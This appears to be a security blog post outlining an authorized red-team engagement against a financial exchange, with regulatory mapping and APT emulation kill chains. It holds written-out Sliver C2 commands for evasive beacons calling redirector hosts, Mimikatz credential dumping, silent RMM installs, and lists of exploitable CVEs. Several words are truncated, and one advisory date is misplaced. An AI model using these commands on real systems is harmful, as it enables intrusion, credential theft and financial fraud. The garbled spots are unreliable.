Security research, vulnerability analysis, technical findings, with an emphasis on Red Team operations

Claude v Finance

zk April 16, 2026 [Red Team, AI]

Red Team Engagement Outline: Financial Exchange Organization

U.S. Industrial Standards Alignment | Sliver C2 | Iran / Israel / Russia / DPRK / Cybercriminal APT Coverage


Regulatory & Standards Framework

This engagement is structured against the full current U.S. regulatory stack for financial exchanges:

NIST CSF 2.0 (Feb 2024) — The primary successor to the FFIEC CAT, with roughly 81% of U.S.-based financial institutions reporting partial or full NIST CSF adoption in 2024 for mapping to FFIEC and SEC guidelines. CSF 2.0 introduces a sixth Govern function alongside the original five (Identify, Protect, Detect, Respond, Recover), providing the board-level accountability framework within which this engagement operates.

FFIEC CAT Retirement (Aug 31, 2025) — The FFIEC CAT was retired effective August 31, 2025. OCC Bulletin 2024-25 directs institutions to adopt any industry-standard cybersecurity framework — NIST CSF 2.0 and the CISA Cybersecurity Performance Goals are the recognized successors.

NIST SP 800-115 — The federal technical standard governing the four-phase penetration test methodology used throughout this engagement. PCI DSS 4.0 explicitly cites NIST SP 800-115 as an accepted penetration testing methodology, alongside OSSTMM, OWASP, and PTES.

NIST SP 800-53 Rev. 5 — Security control catalog for findings mapping, particularly CA-8 (Penetration Testing).

SEC Cybersecurity Disclosure Rules (Dec 2023) — Public companies must file current reports on material cybersecurity incidents within four business days of a materiality determination, and provide annual disclosure on risk management, strategy, and governance in their Form 10-K.

NYDFS 23 NYCRR Part 500 (2nd Amendment, Nov 2023) — The 2023 amendments specify that annual penetration testing must be conducted from both inside and outside the information systems' boundaries, with new requirements for monitoring privileged access and implementing endpoint detection and response solutions. Under Section 500.17(b), the annual compliance notification must be signed by both the entity's highest-ranking executive and its CISO, creating personal liability for senior leadership.

PCI DSS 4.0 (mandatory Mar 31, 2025) — Requirement 11.3.1 mandates external network penetration tests of internet-facing environments at least annually; internal tests are required under 11.3.2.

CRI Cyber Profile 2.0 — The Cyber Risk Institute's financial-sector extension of NIST CSF, knitting together 2,500 regulatory expectations in 318 control objectives and mapping directly to MITRE ATT&CK v16.1.


Phase 1 — Pre-Engagement: Governance & Authorization

All testing requires written authorization under the Computer Fraud and Abuse Act (CFAA, 18 U.S.C. § 1030) before any active activity begins. Required documents:

1.2 Control Team Structure

1.3 Crown Jewel Asset Register

(Aligned to NIST CSF 2.0 ID.AM and NYDFS §500.13)


Phase 2 — Threat Intelligence Report

Produced prior to active testing per NIST SP 800-30 Rev. 1 (Risk Assessment) and NIST CSF 2.0 ID.RA. Satisfies NYDFS §500.9 risk assessment requirements and NIST 800-53 RA-3.

Between April 2024 and April 2025, analysts observed 6,406 dark web forum posts pertaining to financial sector access listings, with ransomware attacks, initial access brokers, third-party compromises, and insider threats among the primary documented attack vectors.

The report covers:


Phase 3 — C2 Infrastructure: Sliver Framework

Why Sliver

Sliver is an open-source cross-platform adversary emulation/red team framework developed by BishopFox. Implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS, and are dynamically compiled with per-binary asymmetric encryption keys. The server and client support macOS, Windows, and Linux.

Importantly, APT29 (Cozy Bear) has used Sliver in intrusion campaigns to build robust C2 infrastructures — making Sliver emulation highly realistic for financial exchange red team scenarios.

Infrastructure Architecture

[Operators] --> [Sliver Team Server] --> [Nginx/Apache Redirectors] --> [Implants on Target]

Sliver implements a distributed architecture that clearly separates server, client, and operator components, allowing maximum operational flexibility. Redirectors should be positioned between the server backend and implants to protect team server identity.

C2 Channel Selection by Scenario

ProtocolUse CaseSliver Command
HTTPSPrimary exfiltration channel; blends with web traffic through Nginx redirectorsliver> https --lhost 0.0.0.0 --lport 443 --domain <c2_domain>
mTLSEncrypted internal pivot channel; mutual certificate authsliver> mtls --lhost 0.0.0.0 --lport 8888
WireGuardStealthy tunnel for long-dwell operations; VPN-like encapsulationsliver> wg --lport 53
DNSEgress through restrictive firewalls; slow beacon for low-noise opssliver> dns --domains <c2_domain>

Implant Generation

Primary Windows HTTPS beacon (staged, evasive):

# Create reusable beacon profile
sliver> profiles new beacon --http https://sliver-redirector.com \
  --os windows --format shellcode --evasion https-win

# Generate staged beacon with gzip + AES-encrypted stage-1
sliver> stage-listener --url http://sliver-domain:80 --profile https-win \
  --compress gzip --aes-encrypt-key "<key>" --aes-encrypt-iv "<iv>"

Multi-channel failover beacon (mTLS → HTTPS → DNS):

sliver> generate --mtls <ip>:8888 --http <c2_domain> --dns <c2_domain> \
  --os windows --arch amd64 --format shellcode --evasion

Long-dwell beacon with jitter (APT persistence emulation):

sliver> profiles new beacon --http https://sliver-redirector.com \
  --os windows --format exe --name apt-persist
sliver> profiles beacon-interval --profile apt-persist --seconds 3600 --jitter 30

Linux implant for server-side pivot:

sliver> generate beacon --http https://sliver-redirector.com \
  --os linux --arch amd64 --evasion --save /output/

Redirector Configuration (Nginx)

location / {
    proxy_pass https://<sliver-teamserver-ip>:443;
    proxy_ssl_verify off;
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
}

Team server firewall rules — only accept connections from redirector:

iptables -A INPUT -p tcp --dport 443 -s <redirector-ip> -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP

Operational Notes

Multiplayer Operator Configuration

# On team server — generate per-operator configs
sliver-server operator --name operator1 --lhost <team_server_ip>

# On operator machine — import and connect
sliver-client import operator1.cfg
sliver-client

Phase 4 — Threat Actor Emulation: APTs & Kill Chains (2023–2025)

All scenarios are driven by the Threat Intelligence Report and mapped to MITRE ATT&CK for Enterprise v16.1 and NIST 800-53 Rev. 5 control families.


APT 1 — Lazarus Group / APT38 / TraderTraitor (DPRK)

Risk Rating: Critical | MITRE: G0032 / G0082 | Sponsor: Reconnaissance General Bureau

APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide, with significant operations including the 2016 Bank of Bangladesh heist ($81 million stolen).

2024–2025 Activity:

Kill Chain:

PhaseTTPMITRE IDSliver Emulation
ReconnaissanceFake LinkedIn recruiter profiles ("Operation Dream Job")T1591.004, T1598OSINT / Gophish persona
Initial AccessTrojanized job offer docs; watering-hole on financial portalsT1566.001, T1189Sliver HTTPS beacon in weaponized doc
ExecutionDLL sideloading via malicious macro chainT1055.001sideload module
PersistenceRegistry run keys; scheduled tasksT1547.001, T1053.005registry write; task-scheduler
Privilege EscalationCVE-2024-38193 / CVE-2024-21338 BYOVDT1068BYOVD harness + Sliver token manipulation
Defense EvasionBYOVD; anti-forensic wipers post-exfilT1014, T1561.002Sliver execute-assembly + custom wiper
Credential AccessKiloAlfa keylogger; CreateProcessAsUserA token theftT1056.001, T1134.002token steal; execute-assembly Seatbelt
Lateral MovementPass-the-hash; LOLBinsT1550.002, T1218Sliver psexec; wmiexec
ImpactFraudulent SWIFT MT103 staging; cold wallet UI spoofingT1657, T1041Sliver WireGuard tunnel to SWIFT endpoint

NIST 800-53 Controls Tested: AC-2, AC-17, SI-3, SI-4, AU-12, IR-4, SC-7


APT 2 — APT34 / OilRig / Hazel Sandstorm (Iran — MOIS / IRGC-linked)

Risk Rating: Critical | MITRE: G0049 | Sponsor: Iranian Ministry of Intelligence

OilRig (APT34) primarily conducts cyber espionage targeting government entities, financial services, telecommunications, defense contractors, and energy organizations, particularly in the Middle East. The group commonly relies on spear-phishing campaigns, credential harvesting, and exploitation of internet-facing applications for initial access, followed by custom backdoors and web shells to maintain persistence.

2024–2025 Activity:

Beginning in September 2024, APT34 intensified operations through a multi-stage intrusion campaign deploying novel malware families including the Veaty and Spearal backdoors. By late 2024 and into early 2025, a renewed campaign introduced C# malware masquerading as PDF documents, incorporating anti-VM checks, timestamp manipulation, and dual C2 channels combining HTTP through European servers hidden behind fake 404 error pages with email-based control using compromised government accounts — commands concealed within Authorization Bearer tokens.

Kill Chain:

PhaseTTPMITRE IDSliver Emulation
ReconnaissanceTarget research on financial employees; infrastructure enumerationT1591, T1590OSINT + Nuclei external scan
Initial AccessSpear-phishing with malicious PDF/C# payload masquerading as regulatory documentT1566.001Sliver beacon embedded in lure PDF
ExecutionPowerShell download cradle; macro executionT1059.001Sliver execute -o powershell
PersistenceWeb shells (HyperShell, HighShell); scheduled tasksT1505.003, T1053Sliver HTTP reverse shell + task-scheduler
Defense EvasionCommand obfuscation; fake 404 C2 pages; Bearer token C2 exfilT1027, T1001.003Custom Sliver HTTP profile with 404 responses
Credential AccessMimikatz; LaZagne; credential-filter DLLsT1003, T1555Sliver sideload mimikatz.dll
Lateral MovementCloud service abuse (OneDrive/Exchange Online as C2)T1567, T1114.002Sliver pivot + cloud enumeration
ExfiltrationLong-term credential/data exfil to cloud storageT1567.002Sliver WireGuard tunnel

Notable CVEs for Scenario Use:

NIST 800-53 Controls Tested: SI-3, SI-4, AC-17, IA-5, AU-12, SC-28


APT 3 — APT35 / Charming Kitten / Mint Sandstorm (Iran — IRGC)

Risk Rating: High | MITRE: G0059 | Sponsor: Islamic Revolutionary Guard Corps

CloudSEK analyzed a credible leak of Charming Kitten operational materials documenting coordinated teams for penetration, malware development, social engineering, and infrastructure compromise, including rapid exploitation of CVE-2024-1709 and mass router DNS manipulation. Victims include government, legal, academic, aviation, energy, and financial sectors across the Middle East, with regions of interest including the US and Asia.

2024–2025 Activity:

APT35 sustained a continuous, technically evolving campaign of cyber espionage from late 2024 through 2025, beginning with BellaCPP — a C++ reimplementation of the BellaCiao .NET implant — alongside the PowerLess backdoor updated to version 3.3.4 with AMSI and ETW bypass techniques, AES-encrypted payloads via malicious LNK files, and Telegram-based command-and-control communication.

Kill Chain:

PhaseTTPMITRE IDSliver Emulation
Initial AccessSpear-phishing with password-protected RAR containing malicious LNK; AI-generated decoy PDFsT1566.001, T1204.002Sliver staged payload in LNK file
ExecutionPowerLess backdoor (PowerShell + AMSI bypass); BellaCPP C++ implantT1059.001Sliver shellcode wrapped with Scarecrow AMSI bypass
PersistenceWinlogon registry modificationT1547.004registry write HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Credential AccessCustom Chromium-based credential stealer (Chrome, Edge, Brave, Opera)T1555.003Sliver execute-assembly + custom stealer BOF
Defense EvasionEDR evasion via C++ re-implementation; supply chain pivotsT1027, T1195Sliver --evasion flag + custom shellcode loader
C2Telegram API; Dropbox; Google Drive; Backblaze; IPFST1102, T1567Sliver DNS beacon as fallback to cloud C2
Lateral MovementAD domination; supply-chain pivots via compromised IT providersT1484, T1195.002Sliver psexec; BloodHound path exploitation

NIST 800-53 Controls Tested: SI-3, SI-4, IA-2, IA-5, SC-7, AC-3


APT 4 — APT33 / Refined Kitten / Peach Sandstorm (Iran — IRGC-linked)

Risk Rating: High | MITRE: G0064 | Focus: Financial infrastructure disruption

Password spraying has become APT33's primary initial access method since 2023, targeting Microsoft 365 and Entra ID at scale using go-http-client through TOR exit nodes. The group has expanded beyond traditional espionage to focus on satellite communications and critical infrastructure.

Kill Chain:

PhaseTTPMITRE IDSliver Emulation
Initial AccessLarge-scale M365/Entra ID password spraying via TORT1110.003External spray tool + Sliver beacon on success
PersistenceAzure infrastructure abuse; legitimate admin tool persistenceT1078.004AADInternals device enrollment + Sliver implant
Lateral MovementCloud tenant pivoting; service principal abuseT1538, T1098.001ROADtools + Sliver HTTPS beacon
ImpactPre-positioned access for destructive wiper deploymentT1485Sliver execute-assembly wiper simulation

APT 5 — MuddyWater / Mango Sandstorm / TA450 / Seedworm (Iran — MOIS)

Risk Rating: Critical | MITRE: G0069 | Sponsor: Iranian Ministry of Intelligence and Security (MOIS)

MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS). Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors including telecommunications, local government, defense, oil and natural gas, and financial organizations in the Middle East, Asia, Africa, Europe, and North America.

CISA has stated MuddyWater actors are "positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors" — making this group particularly dangerous as both a direct threat and an access broker feeding other IRGC-affiliated groups such as Storm-1084/DarkBit.

2024–2025 Activity Directly Relevant to Financial Sector:

C2 Framework Evolution (2017 → 2025):

YearFrameworkNotes
2017–2020POWERSTATSPowerShell-based signature backdoor
2020–2023RMM Abuse (Atera, ScreenConnect, SimpleHelp, N-able)Legitimate tools to blend with enterprise traffic
2023PhonyC2 → MuddyC2GoPython → Golang C2 evolution
Early 2024DarkBeatC2PowerShell-based; Registry AutodialDLL sideloading
May 2024–PresentBugSleep / RustyWaterCustom C backdoor; RustyWater is a Rust-based RAT deployed in early 2026 targeting Israeli government, military, financial, telecommunications, and maritime organizations

Kill Chain (MITRE ATT&CK Mapped):

PhaseTTPMITRE IDSliver Emulation
ReconnaissanceSector-specific OSINT; identify CFOs, finance executives, IT contacts at target exchangeT1591.004, T1589.002OSINT via theHarvester, LinkedIn, FOCA
Initial AccessSpear-phishing from compromised organizational email accounts; lures themed as regulatory compliance docs, webinar invites, or financial recruiter outreachT1566.001, T1566.002Gophish with Rothschild/regulatory lure templates; Sliver beacon in payload
ExecutionBugSleep backdoor injected into target process via WriteProcessMemory/CreateRemoteThread; macro-enabled Office documents; VBS scripts dropping RMM installersT1059.001, T1059.005, T1204.002Sliver shellcode wrapped in custom injector; execute-assembly for .NET payloads
PersistenceScheduled tasks (BugSleep persistence method); Registry run keys; Winlogon hijack via AutodialDLLT1053.005, T1547.001, T1574.012task-scheduler via Sliver; registry write
Defense EvasionSleep API sandbox evasion; DLL sideloading (PowGoop masquerading as GoogleUpdate.exe); C2 infrastructure limited to a few days uptime to hinder attribution; obfuscated PowerShellT1497.003, T1574.002, T1027Sliver --evasion flag; beacon jitter --seconds 3600 --jitter 30 mimicking infrastructure rotation
Credential AccessMimikatz via custom loader/injector; LaZagne; browser credential theftT1003.001, T1555.003Sliver sideload mimikatz.dll; BOF credential harvester
Lateral MovementLegitimate RMM tool abuse (Atera, AnyDesk, SimpleHelp, NetBird, ConnectWise ScreenConnect, PDQ) for hands-on keyboard sessions; WMI; pass-the-hashT1219, T1047, T1550.002Sliver wmiexec; portfwd for RDP via WireGuard; NetExec
CollectionFile staging via BugSleep file transfer; cloud service abuse (Egnyte subdomains mimicking target company names); Telegram Bot API C2 (Small Sieve)T1074.001, T1567.002, T1102Sliver DNS tunnel for low-noise exfil staging
ExfiltrationHTTPS upload via DarkBeatC2 or RMM file transfer; Egnyte/OneDrive abuseT1567.002, T1041Sliver WireGuard tunnel or DNS beacon
Access BrokeringCredential hand-off to other IRGC/MOIS-aligned groups (observed Lyceum/Storm-1084 hand-offs)T1078Not directly emulated; document as finding if credentials reach crown jewel level

Notable CVEs for Scenario Use:

Financial Sector Specific Concern — CFO / Finance Executive Targeting:

Infrastructure analysis reveals consistent use of Firebase-hosted phishing pages, evolving C2 IP addresses, and identical NetBird setup keys across campaigns — indicating a persistent, operationally disciplined adversary adapting to detection while retaining core targeting of financial decision-makers. For a financial exchange, this translates to a direct threat to individuals with trade authorization, settlement approval authority, and access to SWIFT messaging credentials.

Sliver-Specific Emulation Notes:

MuddyWater's hallmark RMM-abuse pattern is best emulated using Sliver's built-in persistence combined with a simulated RMM agent installation:

# Simulate RMM-based persistence (Atera/SimpleHelp pattern)
# Stage 1: Deliver Sliver HTTPS beacon via phishing lure
sliver> profiles new beacon --http https://sliver-redirector.com \
  --os windows --format shellcode --evasion mw-rmm-profile

# Stage 2: Post-access — simulate RMM agent registration for persistence
sliver (SESSION)> execute -o cmd.exe /c "msiexec /i AteraAgent.msi /quiet"

# Simulate BugSleep sleep-evasion behavior via beacon jitter
sliver> profiles beacon-interval --profile mw-rmm-profile \
  --seconds 7200 --jitter 600   # Long beacon interval, high jitter

# Simulate DarkBeatC2 PowerShell C2 pattern
sliver (SESSION)> execute-assembly /tmp/PowerShellRunner.exe \
  -EncodedCommand <base64-obfuscated-PS>

# Simulate Mimikatz via custom loader (no disk drop)
sliver (SESSION)> sideload /tmp/mimikatz.dll sekurlsa::logonpasswords

NIST 800-53 Controls Tested: AC-2, AC-17, IA-5, SI-3, SI-4, SC-7, AU-12, IR-4, SA-9 (third-party risk — RMM abuse), CA-8

Key Detection Gaps to Validate:


APT 6 — Predatory Sparrow / Gonjeshke Darande (Israel — Likely Unit 8200 affiliated)

Risk Rating: High | Focus: Financial infrastructure destruction and disruption

On June 17, 2025, shortly after Israeli airstrikes against Iran, Predatory Sparrow claimed a cyberattack on Iran's state-owned Bank Sepah, causing widespread service outages and claiming to have destroyed the bank's data. The group also claimed responsibility for an attack on the Iranian cryptocurrency exchange Nobitex the following day, stealing $90 million in crypto assets and then destroying the funds by sending them to inaccessible addresses.

Relevance to U.S. Exchange Red Team: Predatory Sparrow's TTPs — infrastructure-layer destruction combined with financial data exfiltration and transaction system disruption — are the highest-fidelity public template for what a destructive state-level attack on a financial exchange looks like. Any U.S. exchange with Israeli vendor relationships, Israeli-licensed technology, or geopolitically exposed market participants should model against this profile.

Kill Chain:

PhaseTTPMITRE IDSliver Emulation
ReconnaissanceDeep intelligence gathering on target financial infrastructure topologyT1590, T1591OSINT + Shodan/Censys mapping
Initial AccessLikely supply chain / insider access to core banking/exchange systemsT1195.002, T1078Sliver beacon via compromised vendor credential
ExecutionDestructive wiper payload deployment to banking transaction systemsT1485, T1561.002Sliver execute-assembly wiper simulation (non-destructive flag)
ImpactData destruction + transaction system disruption + crypto asset drainT1657, T1490Crown jewel access demonstration; SWIFT staging

NIST 800-53 Controls Tested: CP-9, CP-10, SI-12, IR-4, IR-6, SC-28


APT 7 — APT29 / Midnight Blizzard / Cozy Bear (Russia — SVR)

Risk Rating: Critical | MITRE: G0016 | Sponsor: Foreign Intelligence Service (SVR)

APT29 has shifted from traditional malware-heavy operations toward cloud-native tradecraft, heavily targeting identity systems, OAuth applications, and federated trust configurations to move laterally without deploying detectable payloads. High-profile intrusions include the SolarWinds supply chain compromise (2020) and the Microsoft corporate breach (January 2024).

APT29 has used Sliver in their intrusion campaigns to build out robust C2 infrastructures — making Sliver the precisely correct tool for emulating this actor's tradecraft.

2024–2025 Activity:

WINELOADER was attributed with high confidence to APT29 in November 2024. The backdoor employs re-encryption and zeroing of memory buffers to guard sensitive data in memory and evade forensics; C2 servers only respond to specific request types at certain times to prevent automated analysis from retrieving C2 responses.

Kill Chain:

PhaseTTPMITRE IDSliver Emulation
Initial AccessSpear-phishing with ROOTSAW dropper → WINELOADER second-stageT1566.001Sliver HTTPS beacon deployed via ROOTSAW-style dropper
ExecutionWINELOADER via DLL sideloading from legitimate binaryT1574.002Sliver sideload module
PersistenceMultiple redundant implants; cloud service C2 (OneDrive, Graph API)T1078.004, T1567.002Sliver beacon + Graph API exfil tunnel
Defense EvasionTime-gated C2 (server only responds at specific hours); memory zeroing; residential proxy rotationT1027, T1090.002Sliver beacon-interval + jitter config; redirector with time-based allow rules
Lateral MovementOAuth token abuse; federated identity exploitation; service account KerberoastingT1528, T1558.003Sliver + AADInternals OAuth token extraction; Rubeus Kerberoast
CollectionCloud resource enumeration; M365 mail accessT1114.002, T1530ROADtools + Sliver execute-assembly
ExfiltrationLow-and-slow exfil via legitimate cloud servicesT1567.002Sliver DNS/WireGuard tunnel

NIST 800-53 Controls Tested: IA-8, AC-3, SC-7, AU-2, SI-4, IR-4


APT 8 — APT28 / Fancy Bear / Forest Blizzard (Russia — GRU Unit 26165)

Risk Rating: High | MITRE: G0007 | Sponsor: GRU Military Intelligence

The FBI warned that Russia's GRU via APT28 has been exploiting TP-Link routers via CVE-2023-50224 since at least 2024, changing device settings to introduce attacker-controlled DNS resolvers and set up adversary-in-the-middle attacks against encrypted traffic. The GRU also engaged in credential-targeting phishing campaigns against European government entities, leveraging VPNs, Tor, data center IPs, and compromised EdgeOS routers to anonymize operations.

Kill Chain:

PhaseTTPMITRE IDSliver Emulation
Initial AccessSpear-phishing for credential harvest; compromised SOHO router DNS hijackingT1566, T1557.001Evilginx2 AiTM + Sliver beacon on credential capture
PersistenceImplants on edge routers; legitimate credentials from credential sprayT1078, T1505Sliver implant on compromised network device
Lateral MovementCredential reuse; LOLBinsT1550.002, T1218Sliver psexec; NetExec pass-the-hash
CollectionCredential harvesting from M365; email exfiltrationT1114.002Sliver + AADInternals
Defense EvasionTor/VPN/data center IP anonymization; living-off-the-landT1090, T1036Sliver with redirectors behind Cloudflare

NIST 800-53 Controls Tested: IA-5, SC-7, AU-12, SI-4, AC-17


APT 9 — Scattered Spider / UNC3944 (Cybercriminal, English-speaking)

Risk Rating: High | Focus: Cloud financial infrastructure

A notable long-term Scattered Spider campaign targeted cloud infrastructures within insurance and financial sectors through mid-2024, leveraging ransomware strains including RansomHub, BlackCat, and Qilin alongside custom phishing pages impersonating internal portals and Okta/MFA prompts.

Kill Chain:

PhaseTTPMITRE IDSliver Emulation
Initial AccessSMS vishing / help desk social engineering; SIM-swapT1598.004, T1566.004Voice phishing scripts; Sliver beacon after MFA reset
PersistenceAttacker MFA device enrollment via help desk resetT1098.005Sliver implant + AADInternals device enrollment
Privilege EscalationMFA push fatigue; Azure AD conditional access bypassT1621Evilginx2 MFA bypass + Sliver HTTPS
Lateral MovementAzure AD → M365 → SharePoint → OneDriveT1538, T1530Sliver + ROADtools
ImpactRansomHub/BlackCat deployment; double extortionT1486, T1657Simulated ransomware staging (no encryption executed)

APT 10 — RansomHub (RaaS Affiliate)

Risk Rating: High | Focus: Financial sector volume targeting

Emerging in February 2024, RansomHub became the second-most active ransomware group that year, claiming 38 victims in the financial sector between April 2024 and April 2025, with known TTPs including phishing and exploiting public-facing vulnerabilities.

Kill Chain:

PhaseTTPMITRE IDSliver Emulation
Initial AccessFortinet, Citrix, VPN CVE exploitationT1190Metasploit + Sliver beacon on shell
Defense EvasionEDRKillShifter — BYOVD to disable EDRT1562.001BYOVD simulation + Sliver evasion flags
Lateral MovementRDP pivoting; credential reuseT1021.001Sliver portfwd; NetExec
ImpactDouble extortion: exfil + encryptionT1486, T1657Crown jewel access + staged exfil demo

Phase 5 — Attack Execution Methodology

Execution follows NIST SP 800-115 four phases: Planning → Discovery → Attack → Reporting.

5.1 Reconnaissance

(CSF 2.0: Identify | NIST 800-53: RA-2, RA-3)

Passive:

Active (within authorized scope):

5.2 Initial Access Scenarios

Scenario A — Spear Phishing (Lazarus / APT34 / APT35 / MuddyWater emulation) Craft themed lures: SEC/DORA compliance notices, regulatory update PDFs, spoofed vendor invoices, fake job offers, financial recruiter outreach. Deliver via Gophish with AiTM proxy (Evilginx2). Payload: staged Sliver HTTPS beacon wrapped in Donut/Scarecrow shellcode loader.

Scenario B — External Vulnerability Exploitation (RansomHub / APT35 emulation) Target Citrix NetScaler (CVE-2023-4966), Fortinet (CVE-2023-48788), ConnectWise (CVE-2024-1709), PaperCut (CVE-2023-27350). Deploy Sliver beacon on successful shell.

Scenario C — Supply Chain / Third-Party (APT29 / Lazarus / MuddyWater emulation) Simulate compromise of a trading ISV, clearing system vendor, managed service provider, or IT support firm (replicating MuddyWater's "Rashim" IT provider pattern). Sliver beacon deployed via vendor access credential; pivot into exchange network.

Scenario D — Help Desk Social Engineering (Scattered Spider emulation) Voice vishing targeting IT help desk for MFA device enrollment or password reset. Sliver HTTPS beacon deployed post-takeover.

Scenario E — Password Spray / Cloud Identity (APT33 emulation) Large-scale M365 / Entra ID password spray through TOR exit nodes. On success, deploy Sliver beacon; enumerate cloud tenant via AADInternals and ROADtools.

Scenario F — RMM Tool Abuse (MuddyWater emulation) Deliver phishing email from spoofed or compromised organizational account (bypasses SPF/DKIM). Lure targets CFO/finance executive persona. Payload delivers Sliver beacon alongside silent installation of RMM agent (AteraAgent, NetBird, SimpleHelp). Validate whether EDR detects unauthorized RMM agent enrollment per NYDFS §500.14(b).

5.3 Post-Exploitation & Lateral Movement

(CSF 2.0: Detect/Respond | NIST 800-53: AC-2, AC-6, AU-12, IR-4)

TechniqueToolNIST 800-53 Control Tested
AD EnumerationBloodHound CE + SharpHound (via Sliver execute-assembly)AC-2, AC-6
Credential DumpingSliver sideload mimikatz.dll; Nanodump BOFIA-5, SC-28
KerberoastingRubeus via Sliver execute-assemblyIA-5, AC-3
LSASS BypassPPLdump via Sliver sideloadSI-3, SC-39
Lateral MovementSliver psexec, wmiexec, ssh; NetExec (SMB, WMI, MSSQL)SC-7, AC-17
Cloud EnumerationAADInternals, ROADtoolsAC-3, IA-8
Internal PivotSliver portfwd; socks5 proxy; wg-portfwd for RDP via WireGuard tunnelSC-7
SWIFT TargetingCustom scripts via Sliver tunnelSC-8, SI-4, AU-10
Payload EvasionDonut, Scarecrow wrapping Sliver shellcodeSI-3, SC-39
.NET in-memorySliver execute-assembly /path/to/Seatbelt.exe -group=allSI-3, AU-2

5.4 Crown Jewel Flags

ObjectiveCSF 2.0 FunctionThreat Scenario
Domain Admin compromiseProtect / DetectRansomware pre-positioning (RansomHub, APT35)
Trade OMS accessProtectMarket manipulation / trade spoofing (APT34, APT29)
SWIFT endpoint stagingProtectFraudulent transfer (Lazarus, APT38)
Clearing system credential accessProtectSettlement disruption (Predatory Sparrow, APT33)
PII / trading data exfiltrationRespondSEC 8-K materiality trigger; NYDFS 72-hr notification test
Cloud tenant admin accessDetectM365/Entra ID full takeover (APT29, Scattered Spider)
Unauthorized RMM agent enrollmentDetectMuddyWater RMM persistence; NYDFS §500.14(b) EDR gap
Physical / data center accessProtectInsider threat / supply chain (Predatory Sparrow)

Phase 6 — Full Tools & Configuration Reference

CategoryToolConfiguration Notes
C2 FrameworkSliver v1.5.42 (BishopFox)Primary C2; HTTPS/mTLS/WireGuard/DNS; per-binary asymmetric keys; multiplayer operator support; opeource; no licensing cost
C2 RedirectorsNginx / Apache on separate VPSProxy to Sliver team server; iptables whitelist only redirector IP on team server
CDN / FrontingCloudflareFront redirectors to avoid JARM fingerprinting and IP-based blocking
PhishingEvilginx2 + GophishAiTM MFA bypass; lure templates for APT35/APT34/Lazarus/MuddyWater profiles
Payload WrappingDonut, ScarecrowAMSI/ETW bypass on Sliver shellcode output
AD ReconnaissanceBloodHound CE + SharpHoundDelivered via Sliver execute-assembly; Tier-0 path identification
Credential OpsMimikatz (via Sliver sideload), Rubeus, Nanodump BOFIn-memory only; no disk drops
Cloud OpsAADInternals, ROADtoolsEntra ID / M365 enumeration; OAuth token abuse (APT29 / APT33 profiles)
Lateral MovementNetExec, Sliver built-insSMB/WMI/MSSQL; pass-the-hash
Vuln ScanningNuclei + financial CVE templatesCitrix, Fortinet, Exchange, ConnectWise, PaperCut, VPN appliances
OSINTMaltego, SpiderFoot, theHarvester, FOCAPassive recon only until written authorization received
RMM SimulationAteraAgent, NetBird (controlled install)MuddyWater scenario only; install in authorized scope; document for NYDFS §500.14(b) gap testing
ReportingPlexTrac or DradisCVSS v4.0; NIST 800-53 control mapping; MITRE ATT&CK Navigator JSON export

Tester Certifications:


Phase 7 — Historical Reference Reports (2022–2025)

YearReportKey Relevance
2023FS-ISAC "Navigating Cyber 2024"Found that 35% of all DDoS attacks in 2023 targeted financial services; flagged new extortion tactics tied to SEC/DORA disclosure deadlines and quantum computing threats to cryptographic agility.
2023NISA Threat Landscape: Finance (Jan 2023–Jun 2024)**Documented North Korean APTs including Lazarus Group in cryptocurrency theft and ransomware; the FBI linked Lazarus to a $41 million theft from Stake.com in September 2023.
2023ION Group / LockBit Incident (Feb 2023)LockBit's attack on ION disrupted a cleared derivatives trading platform, affecting multiple banks, brokerages, and hedge funds in the US and EU that could not process transactions. Highest-fidelity public template for tradininfrastructure disruption.
2023Clop / MOVEit Supply Chain (Mar–Jul 2023)The Clop ransomware group's exploitation of the MOVEit vulnerability impacted roughly 100 financial companies, establishing the benchmark supply chain scenario for vendor-pivot red team exercises.
2024CISA Advisory AA24-057A — SVR Cloud TacticsDocuments APT29/Midnight Blizzard cloud-native TTPs including residential proxy use and exploitation of system accounts in identity infrastructure — directly infoenario C (APT29).
2024CISA / FBI / CNMF / NCSC Advisory AA22-055A — MuddyWaterJoint advisory formally attributing MuddyWater to MOIS; documents full TTP baseline including spear-phishing, RMM tool abuse, and open-source tool integration — foundational reference for Scenario F.
2024Flashpoint Financial Threat Actor ReportAkira targeted 34 financial organizations; RansomHub claimed 38 financial victims; LockBit claimed access to the US Federal Reserve with alleged exfiltration 3 TB of data; Scattered Spider leveraged SIM swapping extensively.
2024CloudSEK Charming Kitten (APT35) Leak AnalysisCredible leak of APT35 operational materials documenting coordinated teams for penetration, malware development, and social engineering, including rapid exploitation of CVE-2024-1709 and mass router DNS manipulation targeting financial sectors in the Middle East, US, and Asia.
2024Check Point BugSleep Analysis (Jul 2024)Full technical breakdown of MuddyWater's BugSleep backdoor, including sleep API sandbox evasion, mutex creation, encrypted C2 configuration, and Egnyte/file-sharing delivery chain — directly informs MuddyWater Scenario F emulation.
2024Zscaler WINELOADER Analysis (Nov 2024)Documented WINELOADER's time-gated C2 communications and memory forensics evasion — the precise behavioral signature this engagement's Sliver long-dwell configuration should emulate in Scenario C (APT29).
2024Deep Instinct DarkBeatC2 Analysis (Apr 2024) sclosed MuddyWater's DarkBeatC2 framework, including the Registry AutodialDLL sideloading technique and PowerShell-based C2 management — informs Sliver-based DarkBeatC2 emulation.
2025Bybit $1.5B Heist Post-Mortems (Feb 2025)Lazarus deceived exchange executives into authorizing transfer of over 400,000 ETH via a counterfeit wallet management interface — definitive template for transaction authorization layer compromise.
2025Predatory Sparrow — Bank Sepah / Nobitex (Jun 2025)tory Sparrow claimed to have destroyed Bank Sepah's data causing widespread service outages, and the following day stole $90 million from the Nobitex crypto exchange before destroying the funds — establishes the benchmark for destructive state-level financial exchange targeting.
